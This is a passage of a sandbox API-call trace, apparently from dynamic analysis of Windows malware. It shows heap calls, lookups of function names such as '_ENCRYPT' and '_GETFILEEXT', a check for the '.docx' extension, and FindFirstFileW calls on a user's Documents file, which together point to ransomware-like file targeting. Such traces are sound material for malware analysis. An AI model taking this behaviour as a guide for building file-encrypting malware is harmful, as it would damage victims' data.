hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0170.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.882] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0170.882] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0170.883] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.884] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0170.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0170.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.885] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0170.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0170.885] CloseHandle (hObject=0x138) returned 1 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0170.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.886] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0170.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0170.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0170.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.887] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0170.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0170.887] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0170.887] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0170.887] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0170.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.887] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0170.887] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0170.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.888] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.888] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.888] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0x90add8 [0170.888] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0170.888] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0x90add8 [0170.888] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0170.889] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\j0tJZ4pqz2gw.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0170.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\j0tJZ4pqz2gw.docx\"", cchCount1=10, 